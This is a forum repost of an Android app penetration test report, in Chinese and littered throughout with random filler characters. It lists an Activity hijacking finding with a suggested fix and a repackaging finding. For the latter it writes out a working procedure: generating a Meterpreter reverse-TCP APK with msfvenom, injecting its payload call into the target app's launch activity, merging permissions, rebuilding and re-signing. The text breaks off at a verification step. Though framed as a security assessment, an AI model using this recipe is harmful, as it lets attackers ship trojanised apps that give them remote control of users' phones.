原创-app客户端渗透测试报告之反编译捆绑msf马二次打包以及active劫持漏洞

admin · 发表于 2022-6-8 20:32:44

8 G ^" D% I A- |9 x4 ?3 F7 J( W ! ?4 n/ O: p& X' }8 k' ?
8 D; ~0 @9 C& H / f; m+ c$ A& h4 z

- _, W* Q% ~8 ^. }4 ~4 V& w" T9 g0 j3 g. S0 {0 [- \$ h 文档编号： 4 N# H. ?# Z5 {' `$ Y- z+ J' ^; O; o1 B- M0 ]

L, n m" u1 N a! |$ e . Q8 |1 y) g) l* K9 A: m * C* c3 H4 z2 z 8 ]9 c, [9 k+ U0 ?, B

9 C2 B2 U2 |) q1 Q' ^" J+ s - W' C$ c% X# Z9 O' T + u0 F6 X# ^* j" l5 g $ _/ O; J( n+ A+ G2 k: U- ~

/ j- M6 g* [1 P' G/ m( W q( T* K 7 H2 I) e. ^; P+ _" a* ~ 5 O( m# t' o) F8 P* d 1 h! _. e' [ [3 p( f5 D% E8 I. P

% V" L: ?3 M& q% d 2 @% g$ l0 E' @4 q* G2 i * B, b- B0 n' N# {/ N; H9 q% _ ; r% n) A6 d8 T, J, L( w! Q- i5 b

% {9 p( b( ?8 ~6 |! d- O. C . g$ ?' T! _9 }) M) W4 d 0 g. S* k9 d6 u / b2 q' I4 Q7 t, P' C! `. e

, |7 l+ R5 N% |7 F/ G# i0 d& T1 \ 某某某APP渗透测试 " \/ G0 P9 y$ V! w( F3 u! A7 n + Z2 X! c/ C/ s

* _5 O5 V' G, u6 K 5 I' r$ J! k1 Q1 {1 ]8 H x ( w( P: }* q' s$ Q ' f$ u( H+ G q) {

0 C- a7 W7 z% |3 t% s- v+ M. V- a" H; B8 k5 n' L + `2 ?4 ~ [% B; A/ }8 d) t9 e0 r. A% i e' S5 g

* q( H& O. H' X# }$ p" U 0 H) j. T2 a |% n3 G; b3 S5 d : N, ?* x8 ~& Y. @' p, X6 e' D" h+ u [+ y$ k6 ^; [1 N" {. Z

2 k( B, p* A! k7 ]( k* Z * q1 t- p' z! r. j0 T 9 m9 o& P& e3 I* j+ \9 R& ^) }* l2 O

9 A5 c1 I" y& T2 O9 I$ d" V; |( j% h/ O( B- A& V! [. n7 n4 P/ O 技术报告 : _4 l5 P' I6 P - _) Z( I' V3 \0 n5 C; C! t& D

9 M/ L2 V% m3 l. R+ V1 s0 W" A( N9 z5 I ) d/ i2 P5 B& k 7 u9 v3 r7 `; G. I) d1 i) V, `/ j 3 N5 k; Z, t5 o) i) w& |9 i

[4 k- v8 L9 x* ^ 2 _/ T; l: G6 W. M+ L' W& Q * F$ _# e" c9 G8 V# b: f 5 x. v5 y0 W. {3 c' P8 O

) w3 o, O' S' ?5 X0 L: j _ 9 E2 x7 {1 E9 f. h9 c8 A! z( j0 m, l : O% j+ b2 T$ }# U / r2 G! c: z& T) w

l$ [0 d) D: [+ z3 u+ M! |0 \) d( _4 Q6 P0 P n' R+ u 8 _5 |! H3 f4 \$ n e t- P/ _5 P$ F' w# Z' A

: }, |1 Y# X [8 F. ]7 a7 ^# S# a* i2 H# j! K) a, d 2 R) Q5 F; r5 t, N, j9 ~ ) f' {8 w4 `* B9 b/ M. C& S

- r) G3 L# w( C. N( f5 u) m5 G& J2 ^- o' U, D# Q% ~! e- i4 Q* A8 l! _ ' T2 f4 y0 r5 x, w - ]5 i& @# t# ]' s: E* H

: g! F, ~! h$ g8 |$ `, E 5 F+ ^% q4 O3 y1 y, E: _ , e! F1 Z5 d! j7 ^1 x + [ k" `, q; F/ p- E5 u7 B

3 i3 k) ^# z8 h+ C5 ]5 [% \ ' b8 g+ p" G1 K ' l* [! A3 g. b a y) |4 Y 6 L I3 ^1 T& V

. Y) V2 Z2 {+ }5 r# ^% C 6 |% r# j$ j9 n5 n# f: \9 K & Z) S6 M$ O+ ]+ B2 _5 J2 V, p3 }6 L- C( x, ?, e+ u

: k6 O! a2 W: E8 t3 q2 A$ `; Z + S& r# \0 L( ^# w+ B& }8 J 8 M4 J) e( D8 C& @% e( ~# c; a& {

, C" r. K2 W& ]$ |: n6 f: d + G: ~; d1 {8 R, ~8 Q9 q3 x- \ 9 K9 O# h- O8 v & T; n% T; q: Y3 L1 H( ?

2 H) e5 a4 w$ J$ B9 ~" X8 p) u! k* l& l5 B 6 A- M Z* k4 b* Y" X1 Z" a+ ~/ a2 \. J: a# ~& j

- A3 f! c7 z l% m: P+ g! G$ \4 Y# U ?; I9 T 3 X0 \( V; \; }7 ?, e0 R % Q+ U+ x# `8 J0 V' f, o' X4 a2 O

3 z: A8 O# U e# Y: o% U0 B. g" l) s6 I$ x4 C7 d D6 b! V 4 j6 K# S" |* X; R7 N# F X8 x) `' v! S3 W1 \

1 l' I4 j( `0 _8 l, o! T. M3 _- q$ a/ R8 S8 P; ?/ {8 C# a 3 ]$ Y# W. Y C 8 j O u) v P( k* l, \$ e5 f! q

- }; y% R1 f) Q1 H8 K: ~; M+ C/ H ; x/ I/ _: a, D- K+ | / H V2 ^- F) r) r2 b $ n6 z) S5 l: Q

0 ~& W, o5 _1 y8 t, i 0 D* Z; x0 j. v8 Y B. ^- ^. L 4 y& l2 h& s+ m0 l( @! E) d/ B 3 i1 H1 _1 I; s2 h! _" e f

& o, t5 |$ b/ G, m) H( g N% A4 Y! E p$ y7 Y) V. Z( Q1 a3 [ % V" ~; S7 M4 k( h+ j# }

9 P$ r0 b0 H% U. E+ h3 f$ M 5 p$ m! f4 ]2 w0 L- L: d0 k. K 二〇二〇年 & B, H$ ?$ T9 M2 |5 Y9 E) h8 T; g 6 \) e! o$ c2 S4 i; D( c

3 l& M! d& |6 J3 D& }. U6 K$ w ) }% j: y7 p" V$ I# G) E" h5 M 目录 6 D' ^0 ~+ x* |3 X8 ]$ v 8 O! i' n: h2 I5 h% o

, _2 w' j: O# R- y; `; q5 ~; R+ N8 d4 S" @% n G3 m# ~- Z; k4 r 9 D0 K# ~6 s6 O7 w' _4 ? 9 W9 R8 n4 f5 h8 i' a; e

; {1 ?3 g1 `! w2 I4 i 8 D. e) D' F/ V5 L0 p- q0 H 1 概述... 3 $ ^/ F% {- S2 [4 g& ` 9 V; s- H" z0 d8 e4 ]

( T4 }$ G# W& ~7 M) A( ~# c1 ~/ z) s/ \ 1.2测试时间... 3 3 [+ w- }8 G' r5 \- n) u: n0 [7 w0 M6 I7 S

; q N3 l$ B! ?3 [7 g % @. v$ D# W4 e& O 1.3测试对象... 3 8 D) p/ n) ~/ }6 [( z( z J! ]5 B5 s: T5 @/ j- [/ a+ z; N

: Q. b6 w$ a& z; c$ l& Q" D9 F( ]6 j! Z, P6 T 1.4测试结果... 3 1 ~0 L4 C5 o1 T/ _% i ' O O! n0 r$ p$ b) U

1 z. g" P) i+ n% d7 F* d: [& ~7 b5 s: n0 m5 { 2 检测结果... 4 3 @/ z' C) M1 a% ~ ; C4 g4 _* t. i4 C- C& o! _

6 I8 t6 j$ B# G- k / {6 Z4 y+ f( u2 p' {% Z( ^) L 2.1 某某某... 4 & B# X/ ~. R. u3 @ C3 `, v0 T% ^- Y) d9 ^/ S

7 C, K' Y, v$ y; `9 z* j/ ]5 Z- L+ q- C' z 2.1.1检测目标... 4 , r, [7 ^/ ^6 D+ |$ J/ m8 V# u * _/ U- X. v. H$ h. R- a

5 {9 a/ w/ [- k" A/ q , }. t% J$ m6 f5 ~& { 2.1.2检测结果... 4 ) H: S3 G' h0 b4 r) w5 R8 g9 { 0 l/ |& \8 X! X) L- t

" Z: w/ L9 D* D' l( `' ^ % a- M4 \/ k2 f/ `% J) H7 C/ Y 2.1.2.1. 4 ) n6 O3 @1 Z& G% y; H 5 M, V) I6 t2 C

: p! F5 k! ~# w% R8 Z( t. V # r: R6 g% }: f 2.1.2.2. 6 & d. g' _, Y* M$ a1 z( I9 q0 D& G

( i$ r5 W$ w" v% r' F: T/ D( K+ t ' z" p9 D- O) t+ X: x D ! \$ y' `/ l& q3 x+ v0 B1 `: @' G! B+ i5 \1 q" \1 n

8 d; h, d# J) A: y" [+ j. A + Y6 V' Q- a* ]3 V2 w 1 概述 8 g" ~" ] S+ {$ i. H/ a& k; ~ k # z. }4 x# T9 D+ {

+ ~" F6 q3 i' S- A % N) V: Z: J, Z# M1 R. O9 n 1.2测试时间 ) D" `0 e& b! h. {' ^; z 5 r3 r" }, {7 E8 C0 r

0 m: A6 V0 W; \|* n! L4 R2 F # B( N# \4 s8 I - E% ~/ I) J: ?. S ; J8 z; a1 D, M% ]7 e' \| 渗透测试时间 7 k% N# d$ A. ]3 i- v2 m ! I9 r' b& j% n1 ] 3 N' b# I9 i3 C6 T0 O / [: h7 {( {" t0 d& H
" c5 ?: s, a" L/ P 0 o* }$ t* j4 \|- d ( m7 q7 ]1 {& Y0 x. o. G% e " e1 `0 L$ a9 Y% i) I 起始时间 - l; I0 s% }2 ^/ o2 [ ! W" p1 [2 G/ Y$ k! p7 }3 ~ 7 U& g3 X/ c3 Y1 a 9 D' ^' }& C8 V( X& x5 @0 C3 E	4 T5 b6 x) f4 W9 t1 h2 M) l B# d : a% N) E1 S) C* i 5 {5 Q3 v5 g6 ] 1 i0 Y3 T2 X/ r- Q6 Y6 C 2020年4月6日 , S3 B r6 o% Q& j9 S0 k , W" _, t; q: q! A7 O2 v7 W$ } ) k: \& f& `$ Q9 ^9 _' b$ J9 P; s 4 A6 }" W* u* o9 @6 [/ f' m
* O5 e8 I: b" `* k# E! ~+ M n, \$ B0 g; f2 E) Y, `9 S 0 C* f0 @& o5 L5 U3 J' g 8 e( }0 L0 a& X( P4 P, J; L 结束时间 , ^; d$ R/ \|6 W! y/ d X$ @* }( F; p6 s! P) \' u 4 ^* C/ f/ _3 I 9 [2 a0 T6 K) o! i9 @! c1 z) j	, [8 ]9 J! Q- M: X, `4 E& C1 d& B9 ` A @9 v 9 F h2 G8 F4 K) u. X0 q ! j* M; o2 N: n$ S) e* {( V- @5 s 2020年4月9日 e8 f: _' I8 u* R' w6 h 7 z! M! r1 `( W4 k' w" z* I ; S# x5 E' @" f% a/ T2 S 9 t" f. g9 I; d! \. d

) |* `- U6 j; h% y! D1 r4 }$ F 9 n! v2 M# o5 Y* J 1.3测试对象 + Y% _+ w' v- d( Y* n8 d8 i ( A D2 R( X5 i$ z

/ U4 S g- N: E Q2 q7 E % `/ h) N. L* ]' l: H/ m* d0 { 此次测试目标为某某某安卓APP进行渗透性测试，APP存在安全漏洞数量如下表所示： ( Z; _6 Y. f5 P& V! d# S% g: o1 D4 a8 u2 c

/ a2 x. Q3 t/ ]' U% V5 n : m0 ]% P' q# q/ a3 ^ 表1-1 检测对象 % P8 P3 G0 o5 c" Y8 P; j" j. b$ w! m" J% i- S

8 {# D9 F5 ]. w5 K1 U , _ Q4 G# D: O' w7 H( L2 [. R& P & X! f. H; }" d0 J$ \|& V& \|& q- m" a/ F( g& F# r. f& Y 序号 , _* b# h' ? \9 s8 L5 W( E- `4 W( b5 ] 7 b/ P1 X! F+ ~/ W, i6 ]5 u# t 3 n& z3 {/ b" L4 O7 g) g0 T	9 O0 M9 r7 k) B) J3 ?; d2 T9 F; X% N5 F; O2 z # S6 K7 X" h/ \ 9 G$ p% m) Y; b _ 测试对象 2 U! g1 ~; `8 L. R5 T* { 3 I- [6 E$ v7 j( D5 G! F$ T6 V5 ]4 z: L / z) t) N2 O. X I# R8 z F) i: ^# u$ O7 {" y9 g& _9 d	3 R( ^9 Y( v8 D/ U* p ! s7 e( E; H; j G9 Y6 ` ' J7 A/ }0 t. E6 B7 O2 n 1 S2 z( f' E* v" \|' D( a 测试地址 & N; m4 b) Z* N6 \|# W7 I. x# B( D# N 9 C& i$ R# J. k3 q 5 c) z' p7 g5 u4 V& `, d8 r% W4 }/ H' }3 t" T% ?	4 L. z" j+ U- a; K# f; o; ?2 `0 s9 G3 ~ ! A- @# q% O* r, b D5 F$ Z7 r5 c, h 0 c, `* \|7 D5 z% r 安全漏洞 : v" \|) v( M# T5 @; d . \1 ^( L* E* I" K & z$ h( ~2 G/ K& e' \( M 1 v% Q& {6 [, A' Y* ~/ s2 e
7 K q. e5 K$ o: B, J" w9 {9 [ : W! R o7 R& R " W4 e b: Z! ^ G : y7 G9 V& @% i) c" { 1 ' }5 S4 ]( J8 h* x+ D& }4 {% Q V+ q: H+ L6 t4 ?, Z/ [9 ] ? 7 `# N* v) ?! \| c- J6 [1 M # _, R) }2 \|* g	8 o6 r& T- \# m; \|* N : b5 w; b# H) A9 o8 L 4 E# d. R, \& w4 ?" U. Q- \, S6 f" l) a / [7 F. v9 h' ^9 r* ` 某某某安卓APP # m0 W5 N: l. c9 X , ]. X" [4 r) X . Z. L: P8 c! p# G" L2 Z- p: X. \|" U; u5 p* m/ b# k3 V! l	8 V- K3 G; A1 u! w: t/ f # I8 O Y" l7 f & N; b% g f* a$ y0 g1 i- k) q 2 Y. {% A8 y8 a- I! Z; u& [- Y 2 N- V, {5 t# F' j, h: \ ; B/ S+ E( z/ Y% m+ s8 i ) F3 r; } p8 F 7 [1 d5 \; U& l) P" t, Q; O2 Z) d	6 n$ i/ _4 q% X5 z" X2 ?) s 5 y& P% O$ ~; p# h9 e 9 K. X! S! ^+ b( [- L ) u( i Z6 M) @. D# r" N 2 ! j. A% K4 t2 q! G & ~- P. o; ?2 @7 _' R : w9 u' U# H" G2 @# M " R2 w" S7 [$ x( L) E: ?" w1 L) ?

% n0 ~8 O* Y; f8 j/ i 3 I6 }7 Z, _' w, t0 a 1.4测试结果 ) N5 U: A+ D% r" n l# L" ] * O9 ^+ Z; \/ }4 n

, B; A( {) z$ I# w' y% Q% B ; ? e1 i( m% m. v& q+ z! R4 Z 在本次对某某某APP透测试中发现，APP安全防护存在一定问题，主要问题如下所示： 1 `1 i/ S7 E& Y1 Y6 U1 V % `% _7 Y0 k. M6 m; Z7 @

' R- J( z: C, I3 L# u" l 9 M- O. a% V' C' }3 p- N \3 K 4 H W! V t2 [ 5 s7 I9 e0 Y; f/ H0 _8 H1 t3 u( h+ u

@+ c$ L/ f9 @* y/ U0 q6 S+ `% v) l' f$ j 序号 ; K" @4 B. |' K" Y8 L$ T+ h: x3 K$ n( u7 ~* a$ m. _; X

& T" a o; g: R! n" N& u8 V 2 T! `0 T% t3 n5 X, Q 系统名称 7 d- {; |+ I7 Y5 l" ^+ G: J' e6 l4 S1 [/ a! `$ H- n# r

, o) f; B7 ^3 C6 r8 @- J - Y; e6 c }6 a! H( r 漏洞名称 ) _# h1 n+ r4 Z; q7 f/ j5 ]& H & f1 g2 ]% Y3 O5 `$ n. T

- G' v6 j4 Q- _3 y; h0 t- {+ h. R ?7 U6 t1 C' | 漏洞危害 [+ t7 x4 [( D1 W1 E- c * p( A& p. e& x# W5 S

+ x5 M9 `6 s' l7 o! Z& F & n- ^) K9 U3 ^0 {. @$ y 修复结果 0 L0 K# H: v2 v; `- F c 9 t$ c( m1 m& J+ ?

+ U4 F2 K- Z8 \6 y4 _1 _' ?2 T) R9 y8 ]& a' O# s' X 1 8 c0 l/ |7 \+ X+ E: C4 d 2 `$ h) u1 m1 z- ~& ^; P' G

V$ Z o7 B4 w- h. S; |) m. _6 ^+ @ 某某某某某某APP : H& o3 O' u9 c" i$ X n' y- j. ?

7 M, y6 b- H+ H# Z9 @" Y ( b6 `( q' s3 [$ n/ U0 w Activity 劫持 3 j& f) D$ r* {5 k' E2 q* H 5 `; W: E4 U# v

3 u% L' E) n7 z: Q1 r 5 c1 {* b/ a# a4 J. ]. @3 N+ R ( `9 @; {: P( G1 f; w4 _- x3 j' Y, f# V) ~

$ o/ u. e5 u6 E& f7 w # g, N W( ?' T# P# g 高 / ?4 u$ ^. Y/ e 2 f# B. z* `5 q4 |* i0 d- j

% m6 ^2 @9 i) N# y& E5 S $ H6 r7 i4 ?1 z: A6 Z3 j( [ - `' {1 w+ k& C( e7 i" v$ g ) J$ G* ~, P9 y2 O

; H& Y4 u! y: v5 W8 M r $ H& F5 F5 Y a 2 / K' v; A3 m3 M6 _6 ~ , D% W! \0 h k. a

( x* G9 q2 c7 e, F* s: W* V( g# w' Q* T 某某某某某某APP % E, ?& x" X6 X7 i( x0 }+ ] % H7 k" S; L% O8 B2 n

' t6 v* w3 Q% H. v2 A, `+ [$ Q 3 H2 S& a* E" @ 反编译二次打包捆绑木马、篡改APP代码 9 E1 v7 H f; h . R/ c4 j$ i7 H6 j

4 x$ E, H8 F1 h5 q - [5 a! M3 \* j; Q! C0 F 高 . j8 U8 z- I# s7 b , f/ s1 A/ `# L

$ o5 J4 L; H# W8 D% C K% ^# N R6 Z7 Y ' N! e$ `' v) w- {1 L0 b/ C$ k" s9 _6 @; v6 P: a% Y$ N

+ Q n; [: m4 {; D 9 r V+ T) m; Y . r3 E- m# G# |8 M+ W/ ^/ j 4 ]0 z3 C4 ?9 e, j+ F4 l

. Y. U c; ~. W" j9 Y& T$ `2 Y + E+ T# s( ~3 n, ` 表1-2 测试结果 2 \* L# |! S" t- C; h) s+ J8 O6 O ; o- ?3 y) s; W

6 \! J( ^1 L5 t & ~/ g) }$ C7 D, o# A6 \ 3 [7 j1 F* c8 N+ j4 n) \; a: b& n8 C$ J6 b

& r1 f' C8 |: e: }" t5 @& C1 d% J# m 2 检测结果 $ G% P9 y0 D0 E" U( ~5 m 2 A5 t) N' C4 ]$ O/ n, g: r8 K

, Y- k5 g' ?( |; ` 3 r+ S4 k! U! ~3 z- m 2.1 某某某 - N- y5 D$ m2 P/ g& b" u5 o1 s2 {9 a U/ N* x2 A

3 l7 g" [" e5 I/ U- h. z$ U# m- R 2.1.1检测目标 3 @; s# A3 a3 f' N7 T1 T $ K K6 G$ _, E: P

Z( x7 w$ {( E4 Z# [, j$ y- s, o3 i & c- c9 j; Z( | Z5 F+ K 目标地址： 某某某某某某APP 4 M1 s; `0 w; F5 c- x/ f 5 X+ T0 B( _0 g1 P

: U, b! D$ |8 b+ y3 b5 f7 D& H5 \ & P2 N1 Z& N d5 Q t8 V 2.1.2检测结果 & Q5 _8 A p1 ~0 e- A0 _3 V0 j i! k, [. G

+ [1 M Y+ B1 l4 z& l. O5 z* c! V* ^' t; m; n7 Z5 e# M 2.1.2.1 l) t, }$ ^$ | # v- t" j) Q) \" w# w. q

) O9 d4 d, I0 `1 g% d9 m# b7 | e - r. f, O( G; G, J4 H. r 漏洞链接地址：某某某某某某APP + y/ \* [$ b8 I# h$ F/ e . \" i& i% f6 X2 v

7 \9 |( b6 d- E/ A @9 W6 N- c' ^- G4 B# }4 c . |4 K& k0 G7 u: x5 O! d 1 F) C- v% u! r+ r+ x+ R! i `

3 \8 C9 i7 G9 }3 Z5 U( } " f* ]- e! X$ n; p# k" r 漏洞分析及取证： + x2 c; f6 B' r' T ) c9 \, M( P' b3 S# B

# x! ]; R3 \- e9 [) b# m " N4 S6 S" v! l2 L) E6 U 通过androidkiiler反编译，发现app未进行安全加固， Activity 为com.minivision.cmcc.activity.SubActivity可被劫持，复现漏洞如图： 0 C3 V& U1 B) J7 _9 b " P" O; W' g5 |8 E: K8 N8 x$ m' M

6 \' s3 K/ O, v9 X : d0 ]! \8 L7 D7 s ) j. O; j0 |4 i/ @: m+ `/ O, V( r) K; m9 Z& S( ^8 B

6 ^* L" R1 b; S0 `# R$ U- `) q) P% h9 C* p/ J2 m, m ( q7 \3 y+ K& l' Z : ^& P( E, p2 T' o: p. p

% B1 ~: E" U4 V, X% w- Q8 s2 Y, ?. N+ a6 T) I3 [' |0 o, J j+ D & X. [" r" u' q+ ~! S# q. j" W8 o0 k

$ F0 ^) M+ \) B C! l$ ` |6 n " X! @) X6 P; I* h T 4 ~1 S5 D' l& t$ g) E ) Z3 _- i! u1 C% O# ]: m

! E5 Z! n% z {5 T; P# U( a 9 A; b E1 ^. A- v " K- B3 d. z% {' S: J , ]1 W- l/ d' K0 F+ Y

/ a7 g- Z; Y: R& b( _' Q ! E$ m2 ^/ E2 b' Z 漏洞危害：高 6 {% l# v) \1 [* P/ O. K 2 C) H8 y. H, }- w8 [

3 V! d# R8 e/ O1 U! U2 I. ~+ f $ Q& P" I- u' F- R& y . o* v9 s/ r2 W8 p2 F: o5 N! Z. j3 }8 x; h0 \7 e: r 严重程度 ' t z; {0 z5 a+ u ; @* A9 C& ^, @& f5 G ; f/ J; E* C6 i9 f, w8 `1 M 2 t5 K% d5 x, z6 Q# ^9 b	% C+ p% ~+ F+ M! X9 S* s; I8 @; L8 C' d6 [) h5 v7 \0 G - [& o* `, b0 C" a5 h7 H& u1 w2 \|; j 1 l& l9 ?9 ]% v; n0 o. u& f 高 9 E G- E" k8 K6 i% ^/ {* M; P0 k0 k* Z 5 `; E% u1 p5 W: ?8 ?1 ~; U4 c 2 a; W# ]" U% m9 ]: y6 n1 v3 W	1 O) S2 G+ n! S# d$ @! ` ( _% X! U# n, Y ) d' g9 K9 {$ T8 d7 R 8 v' R# i8 f7 K Z ■ % T8 J% G" \7 C( ^ 3 @* s( @8 E5 c6 b% W! n$ P+ G ( C5 N8 M: O" Y, ]' C# J: n, y# G3 j4 A" }& r. {. b& G. E0 z	' \1 [' @# m4 s+ Y# J, W 1 x' v, e) l Y3 w% q ? ; `( A; I q0 i$ P7 e8 P: O+ s j* h0 H( f l4 h$ H3 b' _ 中 2 A) c, h# u/ o& D8 H9 `+ z/ M/ j : t+ \|) a$ q( b, ` & ]1 K$ M g( M8 r* B( j 6 d' D" n* v3 {: Z4 D	6 D1 f2 K4 X* I2 j9 w! ^+ B2 K J & \|# j6 {4 o' R1 q# [ * b, D1 ]# d' A: \ ; ? W A1 C4 o0 \|' ` 6 m& @! ~9 v/ h1 b1 U0 D$ ]5 A, \4 ~9 n; J6 D & D3 x& l$ U( P7 Q+ e; `- V) @) k/ d6 ]- ]+ o+ Z7 ~& v	! Z+ W- L# }/ c* _! Y( u 4 c0 M ^8 J, M7 Z. m ! c4 ^" E' C9 z: H5 y, E, ] a z0 [$ ~) e' q1 B 低 0 F( K5 M, U1 t& u1 Y7 e 5 F K0 z+ D$ y0 D. h & n+ C3 ]" Y4 R: B; n) N `. K* [9 [! K j* Q	0 ~' R, R' m/ v) p0 D% f5 ?& q ; ]7 D) W8 Y7 O; O% N, } ' h4 N" X& s* y: w" K3 r! L 4 X' w1 L6 F3 _+ e$ t2 L A7 Q $ p6 w3 l) Y' P( \' S+ f; }3 U+ E/ ~' z) e 8 a4 {4 q3 a/ O' J0 h! V0 m 1 ^9 Z6 \; j d( H

7 c. q: S% L: s5 N$ a3 {# L; Z$ n9 a2 {/ I - j. E9 X, m1 \* I. w. c % P; l# t% a2 v# I" X- z0 ~

0 \ g- |1 v4 J% o 0 x! I5 C% E1 d; Q' U+ k# f 修复方法：在 APP 的 Activity 界面（也就是 MainActivity）中重写 onKeyDown 方法和 onPause 方法，当其被覆盖时，就能够弹出警示信息。判断程序进入后台是不是由用户自己触发的（触摸返回键或 HOME 键），如果是用户自己触发的则无需弹出警示，否则弹出警示信息。 , A+ J: X' [+ }/ i* n1 r+ L& Y% x# o+ Z; b I b

, J3 N6 W; q8 C5 m0 \7 a! F( a # G# ?+ y/ k6 T8 _ $ p" }# P& r/ a3 j 2 w2 K3 I9 k4 B G: p3 J

$ s1 i' s' S8 Y! k. I8 U# j ! v+ V; r* {! e! q2 n 1 C+ t" v( B: P4 B" x4 N6 w k! x5 h; y# \7 Y7 D8 Z3 q3 e$ ]* P

0 X- M/ l% n4 c; M. X3 _# F7 W $ g& ]9 k" ^! f" ]5 g& D5 Z 2.1.2.2 " g# I4 e1 l3 l! r$ X# t$ q8 H & j$ r- J7 S1 ^: R' ~! g: o

" b P" Q7 K a) k# T+ n6 h * ~1 H) R: `( H7 g 漏洞链接地址：某某某某某某APP - `1 j& D- g' W8 j! p & j4 A, p2 g9 {6 Q. s% C4 Y

; {9 Q3 Q5 p$ P/ B 4 Y$ d) N0 F1 w! E* n. i* _5 D 漏洞分析及取证： 8 @& y, @, L4 y( ^) U ~, B$ T 2 p3 k. B0 l- `% r

5 G) |7 u* b C1 a: @% m% i# W. v6 V* x& ? 通过反编译，发现程序未加壳加密，可直接反编译获取源码，经过测试可修改app代码捆绑木马或者植入广告等操作，复现详细方法如下： ( s& O7 X4 I+ D0 W3 v! C 7 w; Y; t* s }9 n9 }) I0 r" w

; Q3 y |3 J$ U, C* A- ^/ B8 @ | . H4 N. n6 S/ x% g; e) ?3 r 用Metasploit 生成木马 apk 0 F% p7 A$ C& j 8 r# n! z" f( C6 \0 H1 e' x4 x+ {

, B! Y& I: m/ q6 k$ X+ |1 a 2 `3 O! y9 v/ f5 g msfvenom -p android/meterpreter/reverse_tcp LHOST=192.xxx.x.x LPORT=4444 R > cockhorse.apk $ o4 p6 S& |3 E 1 Q- }6 I( i# p/ s

! n6 {5 \* o4 t; N/ U" d # `& ~9 V2 ^5 |) t4 E5 E 反编译目标apk和木马apk 1 _$ ` ~; f% q9 b1 C" W , v! p4 U* r+ k% q7 W( R4 l

6 W( d- T! h0 ^* Q( I( E 1 v9 M2 W5 U! h& c8 m. P apktool d target.apk
4 }9 p- c# D: X# n 5 c9 y% F$ p- n apktool d cockhorse.apk , R4 C4 w; q- ]+ [7 A4 x7 j1 s: H+ E4 j

2 A) \* k, X K ( s# }+ i4 q# w$ Q9 T. r 木马 apk 注入目标 apk ) R$ i2 ^8 \. ^/ K7 E# @4 U, W \2 x7 y

# Q- B, {; t2 l) v% M3 H" f& q+ R ' Z" ?8 c0 k% l6 ^/ k4 N+ d9 s6 D4 x 在目标 apk 反编译生成的文件中找到启动 Activity 的 smali 文件，并在 onCreate()方法中添加如下代码：
1 S& p/ |, T: j7 ]% j% d o6 F4 \6 n# l6 h invoke-static {p0}, Lcom/metasploit/stage/Payload;->start(Landroid/content/Context;)V 1 j6 |" h% \. y# ]: v! P; G$ s: e 4 L" A* T7 G- D( s

) _- \6 f6 ?+ F ; J! m- ]# w5 x Z1 v" o 将木马文件 AndroidManifest.xml 中的权限放到目标文件 AndroidManifest.xml 中，去除重复 * b- C8 E3 O) | |4 G+ ^: v5 O, N2 p: B8 H2 F; R. X4 K( \; P- u9 P

9 C" @4 Q8 q2 N- n7 g% c1 @; S / \2 M8 k: R0 w: z" c/ G 将木马文件的 smali 文件放到目标文件下，例如 com/metasploit 文件复制到目标文件 com/ 下 / y7 s' h* X @( u" y C8 v, y! O- U & K0 w# [. a2 ~, Z+ j; u

6 \8 [# {7 J" Z. o 8 q" {* M+ _2 @3 [ 回编译生成最终 apk ) Y8 c; w6 [6 I, ~1 Q5 f9 Y% i; @8 f' [6 ]6 b T- }& Y v/ d

9 l9 s+ x+ K Q0 E 5 i& R$ f9 j3 G: C7 s0 ]: ]; K% y: D 重新打包 ' i; `- l+ s/ S$ H [, n! c , ?$ t' f- Y) o+ x; k

, W! x( M1 ]5 G/ C; a3 E) h0 ] . F, a& Z, V7 R2 ^" B' [3 J( B" k, m apktool b -o repackage.apk target_app_floder : U& E8 o; O5 m2 j: Y8 T5 F, L8 }# S2 v9 e& R) J7 W( ~% {0 u

+ J# S; u5 R/ b6 B! o3 G$ d! w* V6 r+ A 创建签名文件，有的话可忽略此步骤 7 |. q3 e/ b2 G " N$ }( }1 Y1 @2 A

( e) F0 g# V% T; b' ~ ; v' [/ A+ g1 ~0 k4 V) w' O6 L% m keytool -genkey -v -keystore mykey.keystore -alias mykeyaliasname -keyalg RSA -keysize 2048 -validity 10000 " e5 S& \; n7 U" U 1 Y% K I' L3 K) P

# S H4 ]; T& r4 \7 y6 x . x! J( I" g" T6 e! e x2 t1 J+ o 签名，以下任选其一 H$ `6 Y8 k6 ~) Z% a8 K5 Y$ ]2 P) S" i3 k

. p- r$ f- D+ u) U8 Q6 d ' M% W4 R% S" F# K jarsigner 方式 ) s8 h( X2 {" l7 a. Q0 t) e; W' n0 I; } f8 V; y" n s

+ w, F R: h& L* r. o * f+ ?- v$ y0 B3 I$ a! ~' u jarsigner -sigalg SHA256withRSA -digestalg SHA1 -keystore mykey.keystore -storepass 你的密码 repackaged.apk mykeyaliasname 9 S- |/ {4 B5 i0 `5 a* i5 \: B: d % X( r! A1 U# N5 C

$ w4 ~8 \/ |. T; ^* { 5 f$ e& d' d) K! |. x, f" F$ @ apksigner 方式 3 y7 u/ e/ L2 H0 ]4 }& V+ r l# R: s% T! q) c8 f

7 c$ a$ P6 J6 S" q6 o0 @2 O, e 6 J' ~# e- E" k apksigner sign --ks mykey.keystore --ks-key-alias mykeyaliasname repackaged.apk 4 Q- a* c3 j: }* I" q- H, Y$ I 3 t- }0 b) Q: D C% ~8 J

$ E7 R A% M4 C4 o8 t! P 4 W7 m2 l$ W3 i. l8 z" T 如需要禁用 v2签名 添加选项--v2-signing-enabled false % Y; y6 O, h! K* G* h; @/ _% ]4 R- @$ d+ O

- {; V0 Z& I% E. R/ o 8 @/ [1 U4 g l" G 验证，以下任选其一 / ]/ O' X0 H0 V4 F2 l6 ^ E 4 Z3 `( Z; I) l

; t4 s+ W3 G) j8 z& N- J % S' @0 \1 k) j. C- J# B! ] jarsigner方式 7 h: L7 ?0 y" J8 T) P l- l; I7 p+ x5 ^; w6 M( z

1 A M# e' m" f + W" Q4 C( q8 F7 W3 U jarsigner -verify repackaged.apk G$ F5 X, C e% j# n 1 s& ~1 X/ I0 ]" t, B; F! S' e* I

% @. W Q% r) _2 T. | C+ w; Y5 ?, {# {" X apksigner 方式 $ Z5 j6 d: M+ u$ Y$ J. T$ }" L4 z# M

0 B) Z, ]; }6 ]% u j$ M: c ; O$ b8 F4 i: |0 x8 ?: j apksigner verify -v --print-certs repackaged.apk 6 R3 K) ?7 m4 Z" d9 G ( \4 m& b. o! o7 J$ H2 R

& @8 `! c, I# x$ s4 w& V* C2 r" P' a 5 K9 y% P9 p3 |, `' H keytool方式 ) \$ O. r0 p* R1 z ' o2 E7 b3 c& V. t
